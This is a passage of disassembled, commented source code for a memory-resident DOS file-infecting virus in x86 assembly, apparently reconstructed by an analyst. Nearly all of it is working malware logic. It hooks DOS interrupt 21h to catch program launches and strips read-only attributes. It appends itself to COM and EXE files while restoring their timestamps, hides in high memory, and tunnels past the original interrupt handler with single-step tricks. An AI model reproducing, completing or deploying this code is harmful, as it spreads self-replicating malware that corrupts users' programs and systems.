;1 - - MOV AX,00AE ; - PUSH AX ;2 - - MOV AX,OFFSET VGROUP:BOT_VIR ;B40 - MOV CL,04 ; - SHR AX,CL ; - MOV DX,DS ; - ADD AX,DX ; - PUSH AX ;3 END OF VIRUS EA - - MOV AX,OFFSET J0AC0 ; 0AC0b - SHR AX,CL ; - ADD AX,DX ; - PUSH AX ;4 - - MOV AX,0060 ; - SHR AX,CL ; - ADD AX,DX ; - PUSH AX ;5 - - CALL P_02D8 - - ADD SP,0AH ;REMOVE LAST 5 PUSHES - POPF - POP ES - POP DI - POP SI - POP DX - POP CX - POP BX - POP AX - RETN -P_030E ENDP -;***************************************************************** -WRITE_FILE PROC NEAR - MOV AH,40 - jmp short r_w_int21 - -READ_FILE: - MOV AH,3F - -R_W_INT21: - CALL I21_F_HANDLE ;J035C - - JB J0357 - CMP AX,CX -J0357: RETN -WRITE_FILE ENDP -;****************************************************************** -START_FILE PROC NEAR - XOR AL,AL -MOV_F_PTR: - MOV AH,42 ;MOVE FILE PTR - -I21_F_HANDLE: - MOV BX,WORD PTR CS:[F_HANDLE] - -C2_INT21: - 
PUSHF - CLI ;CLEAR IF - CALL DWORD PTR CS:[OLD_INT21_OFS2] - RETN -START_FILE ENDP -;********************************************************************* - -FORCE_WRITE PROC NEAR - PUSH BX - PUSH AX - MOV BX,WORD PTR CS:[F_HANDLE] - MOV AH,45 ;GET DUPLICATE FILE HANDLE - CALL C2_INT21 - JB WRITE_ER ;J0380 - - MOV BX,AX - MOV AH,3E - CALL C2_INT21 - JMP short NO_PROBLEM - -WRITE_ER: - CLC ; CLEAR CF -NO_PROBLEM: - POP AX - POP BX - RET - -FORCE_WRITE ENDP -;****************************************************************** - -VIR_INT24: - MOV AL,03 - IRET - -HANDLE_C603: - ;THIS IS THE INSTALATION CHECK CALLED ON BY THE VIRUS - ;CHECKS TO SEE IF IN INSTALLED IN MEMORY - ;CALLED CF CLEAR, BX SET 002C, AX SET C603 - ; RETURNS - ; IF CF IS SET THEN THEN IT IS INSTALLED - ; - MOV AX,02DH - - TEST BYTE PTR CS:[X7],02 - JNZ J393 - - DEC AX - -J393: CMP BX,AX - XOR AL,AL ;ZEROS AL - - RCL AL,1 ;ROTATE LEFT THRU CARRY - ;SHIFTS AL 1 BIT TO LEFT THRU CF - ;MOVES THE CF BIT INTO AH - - PUSH AX - MOV AX,002C - TEST BYTE PTR CS:[X7],04 - JNZ J3A6 - - INC AX - -J3A6: CMP BX,AX - - - LES BX,DWORD PTR CS:OLD_INT21_OFS2 - - ;LOADS ES WITH SEGMENT - ; ADDRESS AND BX OFFSET - ; IE. ES:BX -> OLD_INT21_OFS - - POP AX ; - - INC SP ; - INC SP ; SP=SP+2 REMOVE LAST 1 PUSH - ; IE. LAST PUSHF - STI ;SET INTERUPT FLAG - RETF 2 ; RETURN TO HOST -;END HANDLE_C603 - -HANDLE_C600: -;REASON UNKNOW -; DOESN'T SEMM TO BE CALLED BY THIS VIRUS -; - MOV AX,2C - JMP short HANDLE_C5 - -HANDLE_C601: -;REASON ? -;DOESN'T SEEM TO BE CALLED BY VIRUS -; - MOV AL,BYTE PTR CS:[X7] - XOR AH,AH - JMP short HANDLE_C5 - -HANDLE_C602: -;REASON ? 
-;DOESN'T SEEM TO BE CALLED BY VIRUS -; - MOV BYTE PTR CS:[X7],CL - JMP SHORT HANDLE_C5 - - -VIR_INT_21 PROC - PUSHF - - CMP AH,4BH ; LOAD EXEC CALL - JZ HANDLE_4B ; LET VIRUS GO - - CMP AH,0C5 - JZ HANDLE_C5 - - CMP AX,0C600 - JZ HANDLE_C600 - - CMP AX,0C601 - JZ HANDLE_C601 - - CMP AX,0C602 - JE HANDLE_C602 - - CMP AX,0C603 - JE HANDLE_C603 - - POPF - JMP GOTO_INT21 ;NONE OF OUR INTERRUPTS LET - ;DOS INT 21 HANDLE IT - -HANDLE_C5: - POPF ; SETS THE MASKABLE INTERUPTS ON - STI ; - STC ; SETS THE CF FLAG - RETF 2 ; - -HANDLE_4B: - - PUSH AX - XOR AL,AL - XCHG AL,BYTE PTR CS:[INFEC_FL] ;POSSIBLE VAL = 00, FF - ;00 OR 00 = 0 ZF SET - ;FF OR FF = FF ZF CLEAR - ;IF FF CONTINUE TO ATTEMPT - ;INFECTION PROCESS - OR AL,AL - POP AX - JNZ CONT - - POPF - JMP GOTO_INT21 ;INFEC_FL = 00 SO LET - ;DOS HANDLE IT - -CONT: - PUSH DS ;SAVE DS = FILE DS - PUSH CS ;SET DS TO CS - POP DS ;TSR INFECTION - - CALL P_030E ; - - MOV WORD PTR [OFFSET C2_INT21],9090 - - CALL P_030E ; - - POP DS ;RESTORE DS TO FILE DS - - PUSH ES ;BP E ; - PUSH DS ;BP C ;SAVE REGS - PUSH BP ;BP A ;THAT MAY BE - PUSH DI - PUSH SI ;BP 8 ; DESTROYED - PUSH DX ;BP 6 ;LATER TO - PUSH CX ;BP 4 ;BE RESTORED - PUSH BX ;BP 2 ;FOR RETURN TI INT 21 - PUSH AX ;BP ; -;BP POINTS AT AX - MOV BP,SP - - PUSH CS ;DS = TSR INFECTION - POP DS ; - - CMP BYTE PTR [REM2],00 ;INFECTED = 00 IF EQUAL - JE J429 ;NOT INFECTED YET - - JMP LEAVE_ - -J429: INC BYTE PTR [COUNTER] - - PUSH [BP+0E] ; - PUSH [BP+06] ; - CALL OPEN_FILE - - LAHF ;LOAD AH WITH FLAGS - ADD SP,+04 ;REMOVE LAST 2 PUSHS - SAHF ;LOAD FLAGS WITH AH - - JNB CHK_FOR_INFEC ;IF NO ERROR - JMP LEAVE_ ;PROBALY ERROR - -CHK_FOR_INFEC: ; J440 - XOR CX,CX ; SET PTR TO START OF - XOR DX,DX ; VICTIM - CALL START_FILE ; - - MOV DX,OFFSET TOP_HOST ;READ 14 BYTES TO - MOV CX,14 ; - CALL READ_FILE ; - JB ALREADY_INFECTED ;ERROR -; USE CHECKSUM TO FIND POSSIBEL WHERE FILE INFECTION OCCURS -; PLACE PTR THERE - - MOV AX,WORD PTR [CHECKSUM] ;CHECKSUM * 10 - MUL WORD PTR [PAGE_16] ;=0010H 
DX:AX = ORG_SIZE - MOV CX,DX ;MOV RESULTS INTO CX - MOV DX,AX ;DX - CALL START_FILE ;SET POINTER TO A POINT - ;CX:DX FROM START - ;WHICH IN A INFECTED FILE - ;WOULD BE START OF VIRUS -;READ TO THIS LOCATION FORM FILE - - MOV DX,OFFSET TOP_VIR ;READ TO THIS LOCATION - MOV CX,2A ;2A BYTES - CALL READ_FILE ; - JB NOT_INFECTED ;IF ERROR FILE NOT THAT LONG - ; CAN'T BE INFECTED -; NOW COMPARE TO SEE IF FILE IS INFECTED - - CMP WORD PTR [TOP_VIR],7AF4 ; - JNE NOT_INFECTED ;NOT INFECTED GO INFECT - - MOV AX,002C - CMP BYTE PTR [BP+00],00 - JNE J483 - - TEST BYTE PTR [X7],02 ;JUMP IF AN AND OPERATION - JZ J484 ;RESULTS IN ZF SET - -J483: INC AX ; -J484: CMP WORD PTR [TOP_VIR+2],AX ;JUMP IF TOP_VIR+2 => AX - JNB ALREADY_INFECTED ; - -;FILE IS ALREADY INFECTED RESTORE TO ORGINAL FORM - - XOR CX,CX ;SET FILE PTR TO - XOR DX,DX ;ACTUAL START OF - CALL START_FILE ;FILE - - MOV DX,OFFSET TOP_HOST ; - MOV CX,20H ; - CALL WRITE_FILE ; - JB ALREADY_INFECTED ;ERROR - - CALL FORCE_WRITE ; THIS WOULD EFFECTIVELY - ; DISINFECT FILE - JNB J4A4 - -ALREADY_INFECTED: - JMP CLOSE_EXITVIR ; FILE NOW DISINFECTED - -J4A4: MOV CX,WORD PTR [FSIZE1] ;GOTO END OF HOST - MOV DX,WORD PTR [FSIZE2] ; - CALL START_FILE ; - - XOR CX,CX ;WRITE 00 BYTES - CALL WRITE_FILE ;IF ERROR - JB ALREADY_INFECTED ;EXIT - - CALL FORCE_WRITE - JB ALREADY_INFECTED - -;AT THIS TIME THE POSSIBLE INFECTION HAS BEEN REMOVED AND THE FILE RESTORE TO -;ORGIONAL SIZE AND FUNCTION - - JMP CHK_FOR_INFEC ;J440 - -NOT_INFECTED: ;J4BD - MOV AL,02 - MOV CX,0FFFF - MOV DX,0FFF8 - CALL MOV_F_PTR - - MOV DX,OFFSET TOP_HOST ;BUFFER TO READ INTO - MOV CX,08H ;FOR LENGTH - CALL READ_FILE - - JB ERROR_LVE - - CMP WORD PTR [P_COUNT],7AF4 ;IF == MAYBE INFECTED - JE MAKE_SURE ;J4E0 - JMP SHORT INFECT ;J538 - -ERROR_LVE: - JMP CLOSE_EXITVIR ;J6AE - -MAKE_SURE: - CMP BYTE PTR [RELOC],23 ; IF >= - JNB ERROR_LVE ;IT IS INFECTED - - MOV CL,BYTE PTR [RELOC+1] ; ???? 
- MOV AX,WORD PTR [TOP_HOST] ; POSSIBLE SETING UP JUMP - MOV WORD PTR [FSIZE2],AX ; FOR COM FILE - MOV AX,WORD PTR [P_SIZE] ; - SUB AX,0103H ; WHY 103 - MOV WORD PTR [TOP_HOST+1],AX ; - CMP BYTE PTR [RELOC],09 ; - JA J503 ; - - - MOV CL,0E9 ; - -J503: MOV BYTE PTR [TOP_HOST],CL ;E9= JMP - - XOR CX,CX ; - MOV DX,CX ; - CALL START_FILE ; - - MOV DX,OFFSET TOP_HOST ; - MOV CX,0003H ; - CALL WRITE_FILE ; - JB ERROR_LVE ;J4DD - - CALL FORCE_WRITE - JB ERROR_LVE ;J4DD - - XOR CX,CX ;SET FILE POINTER TO END - MOV DX,WORD PTR [FSIZE2] ;OF HOST FILE - CALL START_FILE ; - XOR CX,CX - CALL WRITE_FILE - JB ERROR_EXIT -;52E - CALL FORCE_WRITE - JB ERROR_EXIT - JMP NOT_INFECTED ;J4BD - -ERROR_EXIT: JMP CLOSE_EXITVIR ;J6AE - -;J538 -INFECT: - MOV WORD PTR [TOP_VIR],7AF4 - MOV WORD PTR [TOP_VIR+2],2C - MOV WORD PTR [TOP_VIR+8],0ABE - - CMP BYTE PTR [BP+00],00 - JNE ERROR_EXIT ;J535 - - TEST BYTE PTR [X7],01 - JE ERROR_EXIT -;THIS NEXT PIECE WILL TELL POINTER TO GO TO END OF FILE -;WITH OFFSET 0:0 WHICH SETS DX:AX TO #BYTES IN ENTIRE FILE -;J557 - MOV AL,02 - XOR CX,CX - MOV DX,CX - CALL MOV_F_PTR - MOV [FSIZE1],DX - MOV [FSIZE2],AX - - XOR CX,CX - MOV DX,CX - CALL START_FILE - - MOV DX,OFFSET TOP_HOST ;BUFFER - MOV CX,20 ;#BYTES TO READ - CALL READ_FILE ; - JB ERROR_EXIT ;J535 - -;CHECK FOR TYPE OF FILE BY TESTING FOR SIGNATURE MZ OR ZM -;IF NEITHER IT IS A COM FILE -;J579 - CMP WORD PTR [TOP_HOST],"ZM" - JE EXE_INFEC - CMP WORD PTR [TOP_HOST],"MZ" - JNE COM_INFEC - -EXE_INFEC: - MOV BYTE PTR [COMFILE],00 - MOV AX,WORD PTR [P_COUNT] ;000E - MUL WORD PTR [EXE_PG_SIZE] ;0066 = 200H - SUB AX,[FSIZE2] ;AX=#BYTES IN HOST - SBB DX,[FSIZE1] ;IF BELOW ERROR SOMEPLACE - JB J5E1 ;J5E1 EXIT ERROR - - MOV AX,WORD PTR [I_SS] ;0018 - MUL WORD PTR [PAGE_16] ;0062 - ADD AX,WORD PTR [I_SP] ;001A - MOV CX,DX ;SAVE RESULT EFF ADDRESS OF - MOV BX,AX ;SS:SP AT START OF PROGRAM - - MOV AX,[H_PARA] ;0012 - MUL WORD PTR [PAGE_16] ;0062 - MOV DI,WORD PTR [FSIZE1] - MOV SI,WORD PTR [FSIZE2] - - ADD SI,+0F 
- ADC DI,+00 - AND SI,-10 - - SUB SI,AX - SBB DI,DX - - MOV DX,CX - MOV AX,BX - - SUB AX,SI - SBB DX,DI - - JB J5FF -;J5D4 - ADD SI,0DC0 - ADC DI,+00 - SUB BX,SI - SBB CX,DI - - JNB J5FF ;IF NO ERROR - -J5E1: JMP CLOSE_EXITVIR ;J6AE - -COM_INFEC: ;j5E4 - MOV BYTE PTR [COMFILE],01 ; CHECK IF FILE SIZE - CMP WORD PTR [FSIZE1],+00 ; WILL ALLOW INFECTION - JNZ J5E1 ; - CMP WORD PTR [FSIZE2],+20 ; - JBE J5E1 ; - CMP WORD PTR [FSIZE2],0F277 ; - JNB J5E1 ; - -J5FF: - MOV CX,WORD PTR [FSIZE1] ; FIGURE END OF FILE - MOV DX,WORD PTR [FSIZE2] ; +DATA NEEDED TO GET IT TO - ADD DX,+0F ;A EVEN PAGE IE DIVISIBLE BY 10H - ADC CX,+00 ; - AND DX,-10 ; - CALL START_FILE ; - - XOR DX,DX - MOV CX,0B41 ;OFFSET TOP_VIRUS -OFFSET BOT_VIRUS+1 - PUSH word ptr [x7] - MOV BYTE PTR [x7],01 - CALL WRITE_FILE - POP CX - MOV BYTE PTR [x7],CL - JB J5E1 - - CMP BYTE PTR [COMFILE],00 - JE EXEINFEC ;J638 - - MOV CX,0004 ; WRITES FIRST 4 BYTES - CALL WRITE_FILE ; TO END OF FILE - -EXEINFEC: - CALL FORCE_WRITE ; FA 7A 2C 00 - - JB J5E1 - - MOV DX,WORD PTR [FSIZE1] - MOV AX,[FSIZE2] - ADD AX,000F - ADC DX,+00 - AND AX,0FFF0 - DIV WORD PTR [PAGE_16] - MOV WORD PTR[CHECKSUM],AX - CMP BYTE PTR [COMFILE],00 - JE EXEONLY -;DO THIS TO COM FILE ONLY - MUL WORD PTR [PAGE_16] - MOV BYTE PTR [TOP_HOST],0E9 - ADD AX,07CE - MOV [TOP_HOST+1],AX - JMP SHORT J069E - -EXEONLY: ;66C - MOV [I_CS],AX - MOV WORD PTR [I_IP],07D1 ;OFFSET START - MUL WORD PTR [PAGE_16] - ADD AX,OFFSET VGROUP:BOT_VIR ;B40 - ADC DX,+00 - DIV WORD PTR [EXE_PG_SIZE] - INC AX - MOV WORD PTR [P_COUNT],AX - MOV WORD PTR [P_SIZE],DX - MOV AX,WORD PTR [H_PARA] - SUB WORD PTR [I_CS],AX - -;J692: SET MIN_MALLOC - - MOV SI,OFFSET MINALLOC - CALL P_MIN_MAX_ALLOC - - MOV SI,OFFSET MAXALLOC - CALL P_MIN_MAX_ALLOC - -J069E: XOR CX,CX - MOV DX,CX - CALL START_FILE - - MOV DX,OFFSET TOP_HOST - MOV CX,20 - CALL WRITE_FILE - -CLOSE_EXITVIR: ;J6AE - PUSH [BP+0E] - PUSH [BP+06] - CALL CLOSE_F - -;J6B7 - ADD SP,+04 ;REMOVE LAST 2 PUSH -LEAVE_: - MOV BYTE PTR 
[INFEC_FL],0FF - POP AX - POP BX - POP CX - POP DX - POP SI - POP DI - POP BP - POP DS - POP ES - POPF - -GOTO_INT21: ;J6C9 - PUSHF - PUSH CS ; FLAG <- BP +6 - PUSH WORD PTR CS:[C_OFFSET_21] ; CS <- BP +4 - CMP BYTE PTR CS:[REM2],00 ; IP <- BP +2 - JNE J6D9 ; OLDBP <- BP =SP - IRET ; -J6D9: PUSH BP - MOV BP,SP - OR WORD PTR [BP+06],0100 ;SETS TRAP FLAG ON - ;RETURN - MOV BYTE PTR CS:[REM2],00 - POP BP - IRET -VIR_INT_21 ENDP - - ; C -OPEN_FILE PROC ; A - PUSH BP ; FLAG 8 - MOV BP,SP ; CS 6 - PUSH ES ; IP 4 - PUSH DX ; BP 2 - PUSH CX ;BP-> - PUSH BX - PUSH AX - - MOV AX,3300 ;GET EXT CTRL-BREAK - CALL C2_INT21 ;P361 - MOV BYTE PTR [CTRL_FLAG],DL ;SAVE OLD SETTING - - MOV AX,3301 ;SET CTRL-BREAK - XOR DL,DL ;OFF - CALL C2_INT21 - - MOV AX,3524 ;GET INT 24 - CALL C2_INT21 ;VECTORS - MOV WORD PTR [OLD_INT24_SEG],ES ;SAVE THEM HERE - MOV WORD PTR [OLD_INT24_OFS],BX ; - - MOV DX,OFFSET VIR_INT24 ;J384 - MOV AX,2524 ;SET INT 24 - CALL C2_INT21 ;TO OUR HANDLER - - MOV AX,4300 ;GET THE FILE ATTRIBUTES - PUSH DS ; - LDS DX,[BP+04] ;PTR TO FILENAME - CALL C2_INT21 ; - POP DS ; - JB GET_OUT_F_CL ;PROB_CH - MOV BYTE PTR [F_ATTR],CL ; - - TEST CL,01 ;TEST FOR R_W - JZ NOCHANGE_ATTR ; ITS R_W IF EQUAL - MOV AX,4301 ;CHANGE F_ATTR - push ds - XOR CX,CX ; - LDS DX,[BP+04] ; - CALL C2_INT21 ; - POP DS ; -PROB_CH: - JB GET_OUT_F_CL ; - -NOCHANGE_ATTR: - MOV AX,3D02 ;OPEN FILE R_W - PUSH DS ; - LDS DX,[BP+04] ;FNAME PTR - CALL C2_INT21 - POP DS - JB J0780 -;J74C - MOV WORD PTR [F_HANDLE],AX ; - MOV AX,5700 ;GET FILE TIME DATE - CALL I21_F_HANDLE ; - MOV WORD PTR [F_TIME],CX - MOV WORD PTR [F_DATE],DX - - POP AX - POP BX - POP CX - POP DX - POP ES - POP BP - CLC - RET -OPEN_FILE ENDP ;764 - -CLOSE_F PROC - PUSH BP - MOV BP,SP - PUSH ES - PUSH DX - PUSH CX - PUSH BX - PUSH AX - - MOV CX,WORD PTR [F_TIME] ; RESTORE - MOV DX,WORD PTR [F_DATE] ; TIME AND DATE - MOV AX,5701 ; TO FILE - CALL I21_F_HANDLE - - MOV AH,3E - CALL I21_F_HANDLE ;****************** - -J0780: MOV CL,BYTE PTR [F_ATTR] 
- XOR CL,20 - AND CL,3F - TEST CL,21 - JZ GET_OUT_F_CL ;J7A0 - - MOV AX,4301 - PUSH DS - XOR CH,CH - MOV CL,BYTE PTR [F_ATTR] - LDS DX,[BP+04] ;ASCIZ FILENAME - CALL C2_INT21 ;J361************* - POP DS - -GET_OUT_F_CL: - MOV AX,2524 - PUSH DS - LDS DX,DWORD PTR [OLD_INT24_OFS] - CALL C2_INT21 - POP DS - - MOV DL,BYTE PTR [CTRL_FLAG] - MOV AX,3301 - CALL C2_INT21 - - POP AX - POP BX - POP CX - POP DX - POP ES - POP BP - STC - RET -CLOSE_F ENDP - -RET_HOST PROC - POP CX - MOV DX,0200 - CMP BYTE PTR CS:[BX+REM2],00 - JE J7CC - MOV DH,03 - -J7CC: PUSH DX - PUSH CS - PUSH CX - INC BX - IRET -RET_HOST ENDP - -;07d1 -START: - CALL FIND_OFFSET - -FIND_OFFSET: - POP BX - SUB BX,OFFSET FIND_OFFSET - - MOV BYTE PTR CS:[BX+INFEC_FL],0FF ;D005C - CLD - CMP BYTE PTR CS:[BX+COMFILE],00 - JE EXEFILE ;J800 - -;ONLY OCCURS IF IT IS A COM FILE - MOV SI,OFFSET TOP_HOST ;MOV 20H BYTES FROM - ADD SI,BX ; [SI] TO - MOV DI,0100 ; [DI] - MOV CX,0020 ; - REPZ MOVSB - - PUSH CS - PUSH WORD PTR CS:[BX+HOST_IP] - - PUSH ES - PUSH DS - PUSH AX - JMP short INSTALLED? 
- -EXEFILE: -;NOTICE NO BX+ OFFSET NEEDED BECAUSE IT ASSUMES IT IS EXE AT THIS -;MOMENT - MOV DX,DS - ADD DX,+10 - ADD DX,WORD PTR CS:[I_CS] - PUSH DX - - PUSH word ptr cs:[I_IP] - - PUSH ES - PUSH DS - PUSH AX - -INSTALLED?: - PUSH BX - MOV BX,002C - CLC - MOV AX,0C603 - INT 21 - POP BX - JNB NOT_INSTALLED ;J0827 - -EXIT: - POP AX - POP DS - POP ES - CALL RET_HOST ;P_07BE - RETF -;J0827 -NOT_INSTALLED: - - CMP BYTE PTR cs:[BX+COMFILE],00 - JE FILE_IS_EXE ;J0834 - CMP SP,-10 - JB EXIT ;J0820 - -FILE_IS_EXE: - MOV AX,DS ;LOOK AT MCB - DEC AX ; - MOV ES,AX ; - CMP BYTE PTR ES:[0000],5A ; IS IT Z - JE LAST_MEM_BLOCK ;YES IT IS LAST ONE - - PUSH BX - MOV AH,48 ;REQUEST A BLOCK OF MEM - MOV BX,0FFFF ;LARGEST AVAILABLE - INT 21 - - CMP BX,00BC ;IS BLOCK > BC - JB TO_SMALL ;J0853 - - MOV AH,48 ;AVAIBLE BLOCK IS BIG ENOUGH - INT 21 ; GET IT IN AX - -TO_SMALL: - POP BX - JB EXIT - - DEC AX ;GET MCB SEGMENT IN ES - MOV ES,AX ; - CLI - MOV WORD PTR ES:[0001],0000 ;MARK THIS BLOCK AS FREE - CMP BYTE PTR ES:[0000],5A ; IS LAST MCB - JNE EXIT - - ADD AX,WORD PTR ES:[0003] ;SIZE OF MEM MCB CONTROLS - INC AX ; - MOV WORD PTR ES:[0012],AX ;0012 PTS TO NEXT MCB - -LAST_MEM_BLOCK: - MOV AX,WORD PTR ES:[0003] ;SIZE OF MEM - SUB AX,00BC ;MINUS SIZE VIRUS/10H - JB EXIT ; - - MOV WORD PTR ES:[0003],AX - SUB WORD PTR ES:[0012],00BC - MOV ES,ES:[0012] ;SEG TO LOAD VIRUS INTO - XOR DI,DI ;MOV B40 BYTES FROM - MOV SI,BX ; DS:[SI] - ; TO ES:[DI] - MOV CX,OFFSET VGROUP:BOT_VIR ;0B40 - - DB 0F3, 2E,0A4 -; REPZ CS: MOVSB ; - - PUSH ES - POP DS - PUSH BX - -;J0899 -;NOTE THAT DS:= ES MEANS LOCATION IN HIGH MEM BELOW 640 -;SO THAT IF CS IS REFRENCED YOU MUST STILL USE OFFSET -;BUT IF DS IS USED OFFSET CAN NOT BE USED - - MOV AX,3521 - INT 21 - MOV [OLD_INT21_SEG],ES - MOV [OLD_INT21_OFS],BX - - MOV [OLD_INT21_SEG2],ES - MOV [OLD_INT21_OFS2],BX - - MOV AX,3501 ;GET VECTOR FOR - INT 21 ;INTERUPT 01 - MOV SI,BX ;SAVE IN REGS - MOV DI,ES ;DS:SI - - MOV AX,351C - INT 21 - MOV [OLD_INT1C_SEG],ES - MOV 
[OLD_INT1C_OFS],BX - - POP BX - - MOV AX,2521 - MOV DX,OFFSET VIR_INT_21 - INT 21 - - MOV AX,2501 - MOV DX,OFFSET VIR_INT_01 - INT 21 - - MOV DX,OFFSET VIR_INT_1C - - PUSHF - MOV AX,BX ;PUT OFFSET IN AX - ADD AX,OFFSET VACSINE ;SET UP TO GO HERE - PUSH CS ;USING STACK - - PUSH AX ;SAVE OFFSET - - CLI ;CLEAR INTER FLAGS - PUSHF ;PUSH FLAGS - POP AX ;POP FLAG - OR AX,0100 ;SET TF - PUSH AX ;FOR SINGLE STEP - - MOV AX,BX - ADD AX,OFFSET REAL_INT21 ;FLAGS SET FOR SINGLE STEP - PUSH CS ;CS - PUSH AX ;IP TO REAL_INT21 - MOV AX,251C ;WHEN INT 21 CALLED - ;HOOK 1C - MOV BYTE PTR [SNARE],01 - IRET - -VIR_INT_01 PROC - PUSH BP - MOV BP,SP - CMP BYTE PTR CS:[SNARE],01 ;IF SNARE IS SET - JE YES_NO ;CONTINUE - -EXIT_VIR_INT01: - AND WORD PTR [BP+06],0FEFF ;CLEAR TF - MOV BYTE PTR cs:[SNARE],00 ;CLEAR SNARE - POP BP ; - IRET ; - -YES_NO: CMP WORD PTR [BP+04],0300 ; - JB GOT_IT ;J0918 - POP BP ;NOPE - IRET ;TRY AGAIN - -GOT_IT: - PUSH BX - MOV BX,[BP+02] - MOV WORD PTR CS:[OLD_INT21_OFS2],BX - MOV BX,[BP+04] - MOV WORD PTR CS:[OLD_INT21_SEG2],BX - POP BX - JMP EXIT_VIR_INT01 - -VIR_INT_01 ENDP - -VACSINE: - MOV BYTE PTR [SNARE],00 - - MOV AX,2501 ;RESTORE - MOV DX,SI ;INT 01 - MOV DS,DI ; - INT 21 ; - -;NEXT PIECE OF CODE IS LOOKING AT DS:=0000 -;0000:00C5 MIGHT BE A JUMP TO AN INT BEING ALTERED AT TABLE -;0000:00C7 -;0000:0413 MEM SIZE IN KILOBYTES - - XOR AX,AX - MOV DS,AX - MOV WORD PTR DS:[00C5],397F - MOV BYTE PTR DS:[00C7],2C - MOV AX,WORD PTR DS:[MEM_SIZE] - MOV CL,06 - SHL AX,CL - MOV DS,AX - MOV SI,012E - XOR AX,AX - MOV CX,0061 - -L1: ADD AX,[SI] - ADD SI,+02 - LOOP L1 - - CMP AX,053BH - JE PING_IN_MEM ;J0969 - JMP EXIT ;J0820 - -PING_IN_MEM: - CLI - MOV BYTE PTR DS:[017AH],01H - MOV BYTE PTR DS:[01FBH],01H - MOV BYTE PTR DS:[0093H],0E9H - MOV WORD PTR DS:[0094H],0341H - - PUSH DS - POP ES - - PUSH CS - POP DS - - MOV SI,BX ;STILL = OFFSET - ADD SI,OFFSET NEW_PONG - MOV DI,03D7 - MOV CX,0027 - REPZ MOVSB - STI - JMP EXIT - -P_0995 PROC -;CALLED BY P_09C8 -; - PUSH BP - 
MOV BP,SP - PUSH CX - MOV AX,8000 - XOR CX,CX - -PLOOP: - TEST AX,[BP+08] - JNE J09A8 - INC CX - SHR AX,1 - JMP short PLOOP -J09A8: - XOR AX,[BP+08] - JE J09BC - - MOV AX,[BP+04] - ADD AX,[BP+08] - ADD AX,CX - SUB AX,0011 - CLC - POP CX - POP BP - RET -J09BC: - MOV AX,000F - SUB AX,CX - ADD AX,[BP+06] - STC - POP CX - POP BP - RET -P_0995 ENDP -;******************************************************************** - -P_09C8 PROC -;CALLED BY P_02D8 - PUSH BP - MOV BP,SP - SUB SP,+10 ;ADD BACK SP 5 WORDS - - MOV DX,8000 -L21: TEST DX,[BP+08] - JNZ J09DA - SHR DX,1 - JMP L21 - -J09DA: - LEA DI,[BP-10] ; - MOV CX,0008 ; - XOR AX,AX ; - PUSH SS ;SS = ES - POP ES ; - REPZ STOSW ;MOV 8 WORDS FROM - ;MOV DS:SI - ;TO ES:DI - MOV CX,[BP+08] - -J09E9: TEST CX,DX - JE J0A4B - - PUSH CX - PUSH [BP+06] - PUSH [BP+04] - CALL P_0995 - - MOV ES,AX - LAHF - ADD SP,+06 - SAHF - JB J0A3A - -;0A00 - MOV AX,WORD PTR ES:[0000] ; - XOR [BP-10],AX ; - ; - MOV AX,WORD PTR ES:[0002] ; - XOR [BP-0E],AX ; - ; - MOV AX,WORD PTR ES:[0004] ; - XOR [BP-0C],AX ; - ; - MOV AX,WORD PTR ES:[0006] ; - XOR [BP-0A],AX ; - ; - MOV AX,WORD PTR ES:[0008] ; - XOR [BP-08],AX ; - ; - MOV AX,WORD PTR ES:[000A] ; - XOR [BP-06],AX ; - ; - MOV AX,WORD PTR ES:[000C] ; - XOR [BP-04],AX ; - ; - MOV AX,WORD PTR ES:[000E] ; - XOR [BP-02],AX ; - ; - JMP SHORT J0A4B - -J0A3A: - MOV AX,CX - MOV CX,0008 - LEA SI,[BP-10] - XOR DI,DI - - DB 0F3,36,0A5 -; REPZ SS:MOVSW - - MOV CX,AX - JMP SHORT J0A4E - -J0A4B: - DEC CX - JMP SHORT J09E9 - -J0A4E: - SHR DX,1 - JB J0A54 - JMP SHORT J09DA - -J0A54: - MOV SP,BP - POP BP - RET -P_09C8 ENDP - -;***************************************************************** - -P_0A58 PROC - PUSH BP - MOV BP,SP - PUSH DS - -J0A5C: - MOV DS,[BP+04] - MOV ES,[BP+06] - XOR BX,BX - -J0A64: - MOV AX,WORD PTR ES:[BX] - XOR WORD PTR [BX],AX - ADD BX,+02 - CMP BX,+10 - JB J0A64 - INC WORD PTR [BP+04] - INC WORD PTR [BP+06] - DEC WORD PTR [BP+08] - JNZ J0A5C - - POP DS - POP BP - RET -P_0A58 ENDP 
-;************************************************************ - -P_0A7F PROC - PUSH BP - MOV BP,SP - PUSH DS - MOV BL,01 -J0A85: - XOR SI,SI -J0A87: - XOR CX,CX - MOV DI,[BP+08] - ADD DI,[BP+0A] - DEC DI - -J0A90: - MOV DS,DI - SHR BYTE PTR [SI],1 - RCL CX,1 - DEC DI - CMP DI,[BP+08] - JNB J0A90 - OR CX,CX - JZ J0AB1 - - PUSH CX - PUSH [BP+06] - PUSH [BP+04] - CALL P_0995 - - ADD SP,+06 ; - MOV DS,AX - XOR BYTE PTR [SI],BL -J0AB1: - INC SI - CMP SI,+10 - JB J0A87 - SHL BL,01 - JNB J0A85 - POP DS - POP BP - RET -P_0A7F ENDP - -J0ABE DB 87,0DBH -;J0AC0 DB 88,CB ;VALUE MAYBE USED AS 0ACO - - -J0AC0: DB 88,0CBH,8A,99,8F,38 - DB 0E7H,0CDH,0A1H,9BH,3EH - DB 0EF,86,0C8,97,83,52 - DB 34,0BE,8C,21, 29,0B1 - DB 0F9H,0C1H,9BH,12H,04H,09H,0F3H - DB 45, 01, 93, 01DH, 0B0 - DB 0B9,0C6,01,06,92,37,50 - DB 49,0E8,0D5,71,97 - DB 22,0A6,0E6,04C,50 - DB 0BE,2A,23 - DB 0BE,44, 01DH - DB 0A1,0A6,6BH - DB 0A0,0E0,06 - DB 0AA,1A,0F6,2A,0C0 - DB 02,2F,75,99 - DB 06H,0FH,5BH,97H,02H,3EH - DB 64, 07DH, 0C8,50,66,08 - DB 0C4,0FA,92,8E,64,75 - DB 1BH, 0A6H, 1BH, 0B9H, 32H, 0BDH - DB 0BH, 3EH, 61H, 06DH, 0E0H, 0C4H - DB 0B9H, 29, 0CAH, 9CH, 17H, 08H, 21H - DB 0EAH, 0EEH, 7EH , 85H, 0B1H - DB 63H, 2AH, 0C3H, 71H, 71H, 2CH, 0A0H - DB 0F2H, 8BH, 59H, 0DH - DB 0F9,0D5H, 00H -;POSSIBLE END OF VIRUS - - -BOT_VIR EQU $ ;LABEL FOR END OF VIRUS -VIRUS_CODE ENDS - END start - - - - -